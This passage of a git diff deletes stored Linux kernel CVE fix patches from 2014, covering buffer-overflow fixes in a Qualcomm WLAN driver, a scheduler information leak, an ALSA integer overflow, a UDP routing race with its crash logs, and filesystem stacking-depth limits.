-+                    buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                             "\n\n wlan0 States:-");
-                     len += buf;
-                 }
-                 else if ( P2P_ADAPTER == adapter_num )
-                 {
--                    buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
-+                    buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                             "\n\n p2p0 States:-");
-                     len += buf;
- 
-                     if( !pHddCtx )
-                     {
--                        buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
-+                        buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                                 "\n pHddCtx is NULL");
-                         len += buf;
-                         break;
-@@ -4435,7 +4435,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-                     useAdapter = hdd_get_adapter(pHddCtx, WLAN_HDD_P2P_CLIENT);
-                     if ( !useAdapter )
-                     {
--                        buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
-+                        buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                                 "\n Device not configured as P2P_CLIENT.");
-                         len += buf;
-                         break;
-@@ -4447,7 +4447,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-                 pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR( useAdapter );
-                 if( !pHddStaCtx )
-                 {
--                    buf = snprintf(extra + len,  WE_MAX_STR_LEN - len,
-+                    buf = scnprintf(extra + len,  WE_MAX_STR_LEN - len,
-                             "\n pHddStaCtx is NULL");
-                     len += buf;
-                     break;
-@@ -4455,7 +4455,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
- 
-                 tlState = smeGetTLSTAState(hHal, pHddStaCtx->conn_info.staId[0]);
- 
--                buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
-+                buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                         "\n HDD Conn State - %s "
-                         "\n \n SME State:"
-                         "\n Neighbour Roam State - %s"
-@@ -4478,7 +4478,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-             }
- 
-             /* Printing Lim State starting with global lim states */
--            buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
-+            buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                     "\n \n LIM STATES:-"
-                     "\n Global Sme State - %s "\
-                     "\n Global mlm State - %s "\
-@@ -4493,7 +4493,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-             {
-                 if ( pMac->lim.gpSession[count].valid )
-                 {
--                    buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
-+                    buf = scnprintf(extra + len, WE_MAX_STR_LEN - len,
-                     "\n Lim Valid Session %d:-"
-                     "\n PE Sme State - %s "
-                     "\n PE Mlm State - %s "
-@@ -4574,6 +4574,7 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-             VOS_STATUS status;
-             v_U8_t i, len;
-             char* buf ;
-+
-             tChannelListInfo channel_list;
- 
-             status = iw_softap_get_channel_list(dev, info, wrqu, (char *)&channel_list);
-@@ -4585,20 +4586,23 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-             buf = extra;
- 
-             /**
--                       * Maximum channels = WNI_CFG_VALID_CHANNEL_LIST_LEN. Maximum buffer
--                       * needed = 5 * number of channels. Check if sufficient buffer is available and 
--                       * then proceed to fill the buffer.
--                       */
-+             * Maximum channels = WNI_CFG_VALID_CHANNEL_LIST_LEN. Maximum buffer
-+             * needed = 5 * number of channels. Check if sufficient buffer is available and
-+             * then proceed to fill the buffer.
-+             */
-             if(WE_MAX_STR_LEN < (5 * WNI_CFG_VALID_CHANNEL_LIST_LEN))
-             {
--                hddLog(VOS_TRACE_LEVEL_ERROR, "%s Insufficient Buffer to populate channel list\n",__func__);
-+                hddLog(VOS_TRACE_LEVEL_ERROR,
-+                     "%s Insufficient Buffer to populate channel list\n",
-+                      __func__);
-                 return -EINVAL;
-             }
--            len = snprintf(buf, 5, "%u ", channel_list.num_channels);
-+            len = scnprintf(buf, WE_MAX_STR_LEN, "%u ",
-+                     channel_list.num_channels);
-             buf += len;
-             for(i = 0 ; i < channel_list.num_channels; i++)
-             {
--                len = snprintf(buf, 5,
-+                len = scnprintf(buf, WE_MAX_STR_LEN,
-                                "%u ", channel_list.channels[i]);
-                 buf += len;
-             }
-@@ -4632,6 +4636,36 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-            break;
-        }
- #endif
-+#ifdef FEATURE_CESIUM_PROPRIETARY
-+        case WE_GET_IBSS_STA_INFO:
-+        {
-+            hdd_station_ctx_t *pHddStaCtx =
-+                WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-+            int idx = 0;
-+            int length = 0;
-+
-+            for (idx = 0; idx < HDD_MAX_NUM_IBSS_STA; idx++)
-+            {
-+               if (0 != pHddStaCtx->conn_info.staId[ idx ])
-+               {
-+                   length += scnprintf
-+                             (
-+                             (extra + length), WE_MAX_STR_LEN - length,
-+                             "%d .%02x:%02x:%02x:%02x:%02x:%02x\n",
-+                             pHddStaCtx->conn_info.staId[ idx ],
-+                             pHddStaCtx->conn_info.peerMacAddress[idx].bytes[0],
-+                             pHddStaCtx->conn_info.peerMacAddress[idx].bytes[1],
-+                             pHddStaCtx->conn_info.peerMacAddress[idx].bytes[2],
-+                             pHddStaCtx->conn_info.peerMacAddress[idx].bytes[3],
-+                             pHddStaCtx->conn_info.peerMacAddress[idx].bytes[4],
-+                             pHddStaCtx->conn_info.peerMacAddress[idx].bytes[5]
-+                             );
-+               }
-+            }
-+            wrqu->data.length = strlen(extra)+1;
-+            break;
-+        }
-+#endif
-         default:
-         {
-             hddLog(LOGE, "Invalid IOCTL command %d  \n",  sub_cmd );
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9902/ANY/0001.patch
deleted file mode 100644
index c7b0144d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-From 3b1c44a3a7129dc25abe2c23543f6f66c59e8f50 Mon Sep 17 00:00:00 2001
-From: Kiran Kumar Lokere <klokere@codeaurora.org>
-Date: Thu, 7 Nov 2013 19:01:17 -0800
-Subject: Fix the buffer overflow issue observed in static code analysis.
-
-Fix the possible buffer overflow in IE parsing.
-
-Change-Id: I1a386ac09dbe30562fbd84739eb8d61c6a09b001
-CRs-Fixed: 553937, 553941
----
- CORE/MAC/src/include/dot11f.h          | 2 +-
- CORE/SYS/legacy/src/utils/src/dot11f.c | 6 +++---
- 2 files changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/MAC/src/include/dot11f.h b/CORE/MAC/src/include/dot11f.h
-index 3a82e65..cc89258 100644
---- a/CORE/MAC/src/include/dot11f.h
-+++ b/CORE/MAC/src/include/dot11f.h
-@@ -52,7 +52,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Tue Jul  2 15:39:44 2013 from the following file(s):
-+  * Thu Nov  7 16:38:38 2013 from the following file(s):
-   *
-   * dot11f.frms
-   * 
-diff --git a/CORE/SYS/legacy/src/utils/src/dot11f.c b/CORE/SYS/legacy/src/utils/src/dot11f.c
-index 411f593..1b89baa 100644
---- a/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -29,7 +29,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Tue Jul  2 15:39:44 2013 from the following file(s):
-+  * Thu Nov  7 16:38:38 2013 from the following file(s):
-   *
-   * dot11f.frms
-   * 
-@@ -2976,7 +2976,7 @@ tANI_U32 dot11fUnpackIeCountry(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8 ielen
-     else
-     {
-         pDst->num_triplets = (tANI_U8)( ielen / 3 );
--        if (ielen / 3 > 84){
-+        if (ielen > 84 * 3){
-                 pDst->present = 0;
-                 return DOT11F_SKIPPED_BAD_IE;
-         }
-@@ -4650,7 +4650,7 @@ tANI_U32 dot11fUnpackIeSuppChannels(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8
-     if (pDst->present) status = DOT11F_DUPLICATE_IE;
-     pDst->present = 1;
-     pDst->num_bands = (tANI_U8)( ielen / 2 );
--    if (ielen / 2 > 48){
-+    if (ielen > 48 * 2){
-         pDst->present = 0;
-         return DOT11F_SKIPPED_BAD_IE;
-     }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9902/ANY/0002.patch
deleted file mode 100644
index c7b0144d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9902/ANY/0002.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-From 3b1c44a3a7129dc25abe2c23543f6f66c59e8f50 Mon Sep 17 00:00:00 2001
-From: Kiran Kumar Lokere <klokere@codeaurora.org>
-Date: Thu, 7 Nov 2013 19:01:17 -0800
-Subject: Fix the buffer overflow issue observed in static code analysis.
-
-Fix the possible buffer overflow in IE parsing.
-
-Change-Id: I1a386ac09dbe30562fbd84739eb8d61c6a09b001
-CRs-Fixed: 553937, 553941
----
- CORE/MAC/src/include/dot11f.h          | 2 +-
- CORE/SYS/legacy/src/utils/src/dot11f.c | 6 +++---
- 2 files changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/MAC/src/include/dot11f.h b/CORE/MAC/src/include/dot11f.h
-index 3a82e65..cc89258 100644
---- a/CORE/MAC/src/include/dot11f.h
-+++ b/CORE/MAC/src/include/dot11f.h
-@@ -52,7 +52,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Tue Jul  2 15:39:44 2013 from the following file(s):
-+  * Thu Nov  7 16:38:38 2013 from the following file(s):
-   *
-   * dot11f.frms
-   * 
-diff --git a/CORE/SYS/legacy/src/utils/src/dot11f.c b/CORE/SYS/legacy/src/utils/src/dot11f.c
-index 411f593..1b89baa 100644
---- a/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -29,7 +29,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Tue Jul  2 15:39:44 2013 from the following file(s):
-+  * Thu Nov  7 16:38:38 2013 from the following file(s):
-   *
-   * dot11f.frms
-   * 
-@@ -2976,7 +2976,7 @@ tANI_U32 dot11fUnpackIeCountry(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8 ielen
-     else
-     {
-         pDst->num_triplets = (tANI_U8)( ielen / 3 );
--        if (ielen / 3 > 84){
-+        if (ielen > 84 * 3){
-                 pDst->present = 0;
-                 return DOT11F_SKIPPED_BAD_IE;
-         }
-@@ -4650,7 +4650,7 @@ tANI_U32 dot11fUnpackIeSuppChannels(tpAniSirGlobal pCtx, tANI_U8 *pBuf, tANI_U8
-     if (pDst->present) status = DOT11F_DUPLICATE_IE;
-     pDst->present = 1;
-     pDst->num_bands = (tANI_U8)( ielen / 2 );
--    if (ielen / 2 > 48){
-+    if (ielen > 48 * 2){
-         pDst->present = 0;
-         return DOT11F_SKIPPED_BAD_IE;
-     }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9903/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9903/ANY/0001.patch
deleted file mode 100644
index a5a47412..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9903/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 4efbc454ba68def5ef285b26ebfcfdb605b52755 Mon Sep 17 00:00:00 2001
-From: Vegard Nossum <vegard.nossum@oracle.com>
-Date: Sun, 16 Feb 2014 22:24:17 +0100
-Subject: sched: Fix information leak in sys_sched_getattr()
-
-We're copying the on-stack structure to userspace, but forgot to give
-the right number of bytes to copy. This allows the calling process to
-obtain up to PAGE_SIZE bytes from the stack (and possibly adjacent
-kernel memory).
-
-This fix copies only as much as we actually have on the stack
-(attr->size defaults to the size of the struct) and leaves the rest of
-the userspace-provided buffer untouched.
-
-Found using kmemcheck + trinity.
-
-Fixes: d50dde5a10f30 ("sched: Add new scheduler syscalls to support an extended scheduling parameters ABI")
-Cc: Dario Faggioli <raistlin@linux.it>
-Cc: Juri Lelli <juri.lelli@gmail.com>
-Cc: Ingo Molnar <mingo@kernel.org>
-Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
-Signed-off-by: Peter Zijlstra <peterz@infradead.org>
-Link: http://lkml.kernel.org/r/1392585857-10725-1-git-send-email-vegard.nossum@oracle.com
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
----
- kernel/sched/core.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index 33d030a..a6e7470 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -3786,7 +3786,7 @@ static int sched_read_attr(struct sched_attr __user *uattr,
- 		attr->size = usize;
- 	}
- 
--	ret = copy_to_user(uattr, attr, usize);
-+	ret = copy_to_user(uattr, attr, attr->size);
- 	if (ret)
- 		return -EFAULT;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9904/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9904/ANY/0001.patch
deleted file mode 100644
index 4ad5569a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9904/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 6217e5ede23285ddfee10d2e4ba0cc2d4c046205 Mon Sep 17 00:00:00 2001
-From: Dan Carpenter <dan.carpenter@oracle.com>
-Date: Wed, 16 Jul 2014 09:37:04 +0300
-Subject: ALSA: compress: fix an integer overflow check
-
-I previously added an integer overflow check here but looking at it now,
-it's still buggy.
-
-The bug happens in snd_compr_allocate_buffer().  We multiply
-".fragments" and ".fragment_size" and that doesn't overflow but then we
-save it in an unsigned int so it truncates the high bits away and we
-allocate a smaller than expected size.
-
-Fixes: b35cc8225845 ('ALSA: compress_core: integer overflow in snd_compr_allocate_buffer()')
-Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/compress_offload.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index 7403f34..89028fa 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -491,7 +491,7 @@ static int snd_compress_check_input(struct snd_compr_params *params)
- {
- 	/* first let's check the buffer parameter's */
- 	if (params->buffer.fragment_size == 0 ||
--			params->buffer.fragments > SIZE_MAX / params->buffer.fragment_size)
-+	    params->buffer.fragments > INT_MAX / params->buffer.fragment_size)
- 		return -EINVAL;
- 
- 	/* now codec parameters */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9914/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9914/ANY/0001.patch
deleted file mode 100644
index a630feea..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9914/ANY/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 9709674e68646cee5a24e3000b3558d25412203a Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Tue, 10 Jun 2014 06:43:01 -0700
-Subject: ipv4: fix a race in ip4_datagram_release_cb()
-
-Alexey gave a AddressSanitizer[1] report that finally gave a good hint
-at where was the origin of various problems already reported by Dormando
-in the past [2]
-
-Problem comes from the fact that UDP can have a lockless TX path, and
-concurrent threads can manipulate sk_dst_cache, while another thread,
-is holding socket lock and calls __sk_dst_set() in
-ip4_datagram_release_cb() (this was added in linux-3.8)
-
-It seems that all we need to do is to use sk_dst_check() and
-sk_dst_set() so that all the writers hold same spinlock
-(sk->sk_dst_lock) to prevent corruptions.
-
-TCP stack do not need this protection, as all sk_dst_cache writers hold
-the socket lock.
-
-[1]
-https://code.google.com/p/address-sanitizer/wiki/AddressSanitizerForKernel
-
-AddressSanitizer: heap-use-after-free in ipv4_dst_check
-Read of size 2 by thread T15453:
- [<ffffffff817daa3a>] ipv4_dst_check+0x1a/0x90 ./net/ipv4/route.c:1116
- [<ffffffff8175b789>] __sk_dst_check+0x89/0xe0 ./net/core/sock.c:531
- [<ffffffff81830a36>] ip4_datagram_release_cb+0x46/0x390 ??:0
- [<ffffffff8175eaea>] release_sock+0x17a/0x230 ./net/core/sock.c:2413
- [<ffffffff81830882>] ip4_datagram_connect+0x462/0x5d0 ??:0
- [<ffffffff81846d06>] inet_dgram_connect+0x76/0xd0 ./net/ipv4/af_inet.c:534
- [<ffffffff817580ac>] SYSC_connect+0x15c/0x1c0 ./net/socket.c:1701
- [<ffffffff817596ce>] SyS_connect+0xe/0x10 ./net/socket.c:1682
- [<ffffffff818b0a29>] system_call_fastpath+0x16/0x1b
-./arch/x86/kernel/entry_64.S:629
-
-Freed by thread T15455:
- [<ffffffff8178d9b8>] dst_destroy+0xa8/0x160 ./net/core/dst.c:251
- [<ffffffff8178de25>] dst_release+0x45/0x80 ./net/core/dst.c:280
- [<ffffffff818304c1>] ip4_datagram_connect+0xa1/0x5d0 ??:0
- [<ffffffff81846d06>] inet_dgram_connect+0x76/0xd0 ./net/ipv4/af_inet.c:534
- [<ffffffff817580ac>] SYSC_connect+0x15c/0x1c0 ./net/socket.c:1701
- [<ffffffff817596ce>] SyS_connect+0xe/0x10 ./net/socket.c:1682
- [<ffffffff818b0a29>] system_call_fastpath+0x16/0x1b
-./arch/x86/kernel/entry_64.S:629
-
-Allocated by thread T15453:
- [<ffffffff8178d291>] dst_alloc+0x81/0x2b0 ./net/core/dst.c:171
- [<ffffffff817db3b7>] rt_dst_alloc+0x47/0x50 ./net/ipv4/route.c:1406
- [<     inlined    >] __ip_route_output_key+0x3e8/0xf70
-__mkroute_output ./net/ipv4/route.c:1939
- [<ffffffff817dde08>] __ip_route_output_key+0x3e8/0xf70 ./net/ipv4/route.c:2161
- [<ffffffff817deb34>] ip_route_output_flow+0x14/0x30 ./net/ipv4/route.c:2249
- [<ffffffff81830737>] ip4_datagram_connect+0x317/0x5d0 ??:0
- [<ffffffff81846d06>] inet_dgram_connect+0x76/0xd0 ./net/ipv4/af_inet.c:534
- [<ffffffff817580ac>] SYSC_connect+0x15c/0x1c0 ./net/socket.c:1701
- [<ffffffff817596ce>] SyS_connect+0xe/0x10 ./net/socket.c:1682
- [<ffffffff818b0a29>] system_call_fastpath+0x16/0x1b
-./arch/x86/kernel/entry_64.S:629
-
-[2]
-<4>[196727.311203] general protection fault: 0000 [#1] SMP
-<4>[196727.311224] Modules linked in: xt_TEE xt_dscp xt_DSCP macvlan bridge coretemp crc32_pclmul ghash_clmulni_intel gpio_ich microcode ipmi_watchdog ipmi_devintf sb_edac edac_core lpc_ich mfd_core tpm_tis tpm tpm_bios ipmi_si ipmi_msghandler isci igb libsas i2c_algo_bit ixgbe ptp pps_core mdio
-<4>[196727.311333] CPU: 17 PID: 0 Comm: swapper/17 Not tainted 3.10.26 #1
-<4>[196727.311344] Hardware name: Supermicro X9DRi-LN4+/X9DR3-LN4+/X9DRi-LN4+/X9DR3-LN4+, BIOS 3.0 07/05/2013
-<4>[196727.311364] task: ffff885e6f069700 ti: ffff885e6f072000 task.ti: ffff885e6f072000
-<4>[196727.311377] RIP: 0010:[<ffffffff815f8c7f>]  [<ffffffff815f8c7f>] ipv4_dst_destroy+0x4f/0x80
-<4>[196727.311399] RSP: 0018:ffff885effd23a70  EFLAGS: 00010282
-<4>[196727.311409] RAX: dead000000200200 RBX: ffff8854c398ecc0 RCX: 0000000000000040
-<4>[196727.311423] RDX: dead000000100100 RSI: dead000000100100 RDI: dead000000200200
-<4>[196727.311437] RBP: ffff885effd23a80 R08: ffffffff815fd9e0 R09: ffff885d5a590800
-<4>[196727.311451] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
-<4>[196727.311464] R13: ffffffff81c8c280 R14: 0000000000000000 R15: ffff880e85ee16ce
-<4>[196727.311510] FS:  0000000000000000(0000) GS:ffff885effd20000(0000) knlGS:0000000000000000
-<4>[196727.311554] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-<4>[196727.311581] CR2: 00007a46751eb000 CR3: 0000005e65688000 CR4: 00000000000407e0
-<4>[196727.311625] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-<4>[196727.311669] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
-<4>[196727.311713] Stack:
-<4>[196727.311733]  ffff8854c398ecc0 ffff8854c398ecc0 ffff885effd23ab0 ffffffff815b7f42
-<4>[196727.311784]  ffff88be6595bc00 ffff8854c398ecc0 0000000000000000 ffff8854c398ecc0
-<4>[196727.311834]  ffff885effd23ad0 ffffffff815b86c6 ffff885d5a590800 ffff8816827821c0
-<4>[196727.311885] Call Trace:
-<4>[196727.311907]  <IRQ>
-<4>[196727.311912]  [<ffffffff815b7f42>] dst_destroy+0x32/0xe0
-<4>[196727.311959]  [<ffffffff815b86c6>] dst_release+0x56/0x80
-<4>[196727.311986]  [<ffffffff81620bd5>] tcp_v4_do_rcv+0x2a5/0x4a0
-<4>[196727.312013]  [<ffffffff81622b5a>] tcp_v4_rcv+0x7da/0x820
-<4>[196727.312041]  [<ffffffff815fd9e0>] ? ip_rcv_finish+0x360/0x360
-<4>[196727.312070]  [<ffffffff815de02d>] ? nf_hook_slow+0x7d/0x150
-<4>[196727.312097]  [<ffffffff815fd9e0>] ? ip_rcv_finish+0x360/0x360
-<4>[196727.312125]  [<ffffffff815fda92>] ip_local_deliver_finish+0xb2/0x230
-<4>[196727.312154]  [<ffffffff815fdd9a>] ip_local_deliver+0x4a/0x90
-<4>[196727.312183]  [<ffffffff815fd799>] ip_rcv_finish+0x119/0x360
-<4>[196727.312212]  [<ffffffff815fe00b>] ip_rcv+0x22b/0x340
-<4>[196727.312242]  [<ffffffffa0339680>] ? macvlan_broadcast+0x160/0x160 [macvlan]
-<4>[196727.312275]  [<ffffffff815b0c62>] __netif_receive_skb_core+0x512/0x640
-<4>[196727.312308]  [<ffffffff811427fb>] ? kmem_cache_alloc+0x13b/0x150
-<4>[196727.312338]  [<ffffffff815b0db1>] __netif_receive_skb+0x21/0x70
-<4>[196727.312368]  [<ffffffff815b0fa1>] netif_receive_skb+0x31/0xa0
-<4>[196727.312397]  [<ffffffff815b1ae8>] napi_gro_receive+0xe8/0x140
-<4>[196727.312433]  [<ffffffffa00274f1>] ixgbe_poll+0x551/0x11f0 [ixgbe]
-<4>[196727.312463]  [<ffffffff815fe00b>] ? ip_rcv+0x22b/0x340
-<4>[196727.312491]  [<ffffffff815b1691>] net_rx_action+0x111/0x210
-<4>[196727.312521]  [<ffffffff815b0db1>] ? __netif_receive_skb+0x21/0x70
-<4>[196727.312552]  [<ffffffff810519d0>] __do_softirq+0xd0/0x270
-<4>[196727.312583]  [<ffffffff816cef3c>] call_softirq+0x1c/0x30
-<4>[196727.312613]  [<ffffffff81004205>] do_softirq+0x55/0x90
-<4>[196727.312640]  [<ffffffff81051c85>] irq_exit+0x55/0x60
-<4>[196727.312668]  [<ffffffff816cf5c3>] do_IRQ+0x63/0xe0
-<4>[196727.312696]  [<ffffffff816c5aaa>] common_interrupt+0x6a/0x6a
-<4>[196727.312722]  <EOI>
-<1>[196727.313071] RIP  [<ffffffff815f8c7f>] ipv4_dst_destroy+0x4f/0x80
-<4>[196727.313100]  RSP <ffff885effd23a70>
-<4>[196727.313377] ---[ end trace 64b3f14fae0f2e29 ]---
-<0>[196727.380908] Kernel panic - not syncing: Fatal exception in interrupt
-
-Reported-by: Alexey Preobrazhensky <preobr@google.com>
-Reported-by: dormando <dormando@rydia.ne>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Fixes: 8141ed9fcedb2 ("ipv4: Add a socket release callback for datagram sockets")
-Cc: Steffen Klassert <steffen.klassert@secunet.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/datagram.c | 20 +++++++++++++++-----
- 1 file changed, 15 insertions(+), 5 deletions(-)
-
-diff --git a/net/ipv4/datagram.c b/net/ipv4/datagram.c
-index 8b5134c..a3095fd 100644
---- a/net/ipv4/datagram.c
-+++ b/net/ipv4/datagram.c
-@@ -86,18 +86,26 @@ out:
- }
- EXPORT_SYMBOL(ip4_datagram_connect);
- 
-+/* Because UDP xmit path can manipulate sk_dst_cache without holding
-+ * socket lock, we need to use sk_dst_set() here,
-+ * even if we own the socket lock.
-+ */
- void ip4_datagram_release_cb(struct sock *sk)
- {
- 	const struct inet_sock *inet = inet_sk(sk);
- 	const struct ip_options_rcu *inet_opt;
- 	__be32 daddr = inet->inet_daddr;
-+	struct dst_entry *dst;
- 	struct flowi4 fl4;
- 	struct rtable *rt;
- 
--	if (! __sk_dst_get(sk) || __sk_dst_check(sk, 0))
--		return;
--
- 	rcu_read_lock();
-+
-+	dst = __sk_dst_get(sk);
-+	if (!dst || !dst->obsolete || dst->ops->check(dst, 0)) {
-+		rcu_read_unlock();
-+		return;
-+	}
- 	inet_opt = rcu_dereference(inet->inet_opt);
- 	if (inet_opt && inet_opt->opt.srr)
- 		daddr = inet_opt->opt.faddr;
-@@ -105,8 +113,10 @@ void ip4_datagram_release_cb(struct sock *sk)
- 				   inet->inet_saddr, inet->inet_dport,
- 				   inet->inet_sport, sk->sk_protocol,
- 				   RT_CONN_FLAGS(sk), sk->sk_bound_dev_if);
--	if (!IS_ERR(rt))
--		__sk_dst_set(sk, &rt->dst);
-+
-+	dst = !IS_ERR(rt) ? &rt->dst : NULL;
-+	sk_dst_set(sk, dst);
-+
- 	rcu_read_unlock();
- }
- EXPORT_SYMBOL_GPL(ip4_datagram_release_cb);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2014-9922/3.10/0002.patch
deleted file mode 100644
index d8ba31bc..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0002.patch
+++ /dev/null
@@ -1,72 +0,0 @@
-From 48a6c91c1d967cc8375621509676a9eabfac5777 Mon Sep 17 00:00:00 2001
-From: Miklos Szeredi <mszeredi@suse.cz>
-Date: Fri, 24 Oct 2014 00:14:39 +0200
-Subject: [PATCH] BACKPORT: fs: limit filesystem stacking depth
-
-Add a simple read-only counter to super_block that indicates how deep this
-is in the stack of filesystems.  Previously ecryptfs was the only stackable
-filesystem and it explicitly disallowed multiple layers of itself.
-
-Overlayfs, however, can be stacked recursively and also may be stacked
-on top of ecryptfs or vice versa.
-
-To limit the kernel stack usage we must limit the depth of the
-filesystem stack.  Initially the limit is set to 2.
-
-Signed-off-by: Miklos Szeredi <mszeredi@suse.cz>
-
-(cherry picked from commit 69c433ed2ecd2d3264efd7afec4439524b319121)
-
-Bug: 32761463
-Change-Id: I69b2fba2112db2ece09a1bf61a44f8fc4db00820
----
- fs/ecryptfs/main.c |  7 +++++++
- include/linux/fs.h | 10 ++++++++++
- 2 files changed, 17 insertions(+)
-
-diff --git a/fs/ecryptfs/main.c b/fs/ecryptfs/main.c
-index 329a9cc2b2ebe..8a041bb0753fa 100644
---- a/fs/ecryptfs/main.c
-+++ b/fs/ecryptfs/main.c
-@@ -577,6 +577,13 @@ static struct dentry *ecryptfs_mount(struct file_system_type *fs_type, int flags
- 	s->s_maxbytes = path.dentry->d_sb->s_maxbytes;
- 	s->s_blocksize = path.dentry->d_sb->s_blocksize;
- 	s->s_magic = ECRYPTFS_SUPER_MAGIC;
-+	s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
-+
-+	rc = -EINVAL;
-+	if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
-+		goto out_free;
-+	}
- 
- 	inode = ecryptfs_get_inode(path.dentry->d_inode, s);
- 	rc = PTR_ERR(inode);
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 1bbd26958874f..0d1e1680f3657 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -244,6 +244,12 @@ struct iattr {
-  */
- #include <linux/quota.h>
- 
-+/*
-+ * Maximum number of layers of fs stack.  Needs to be limited to
-+ * prevent kernel stack overflow
-+ */
-+#define FILESYSTEM_MAX_STACK_DEPTH 2
-+
- /** 
-  * enum positive_aop_returns - aop return codes with specific semantics
-  *
-@@ -1331,6 +1337,10 @@ struct super_block {
- 
- 	/* AIO completions deferred from interrupt context */
- 	struct workqueue_struct *s_dio_done_wq;
-+	/*
-+	 * Indicates how deep in a filesystem stack this SB is
-+	 */
-+	int s_stack_depth;
- };
- 
- /* superblock cache pruning functions */
diff --git a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2014-9922/3.10/0003.patch
deleted file mode 100644
index b745bbd2..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9922/3.10/0003.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 57bc19ec472ab303209b2d96a59a619c5221594d Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Wed, 8 Feb 2017 15:33:48 -0800
-Subject: [PATCH] sdcardfs: limit stacking depth
-
-Limit filesystem stacking to prevent stack overflow.
-
-Bug: 32761463
-Change-Id: I8b1462b9c0d6c7f00cf110724ffb17e7f307c51e
-Signed-off-by: Andrew Chant <achant@google.com>
----
- fs/sdcardfs/main.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
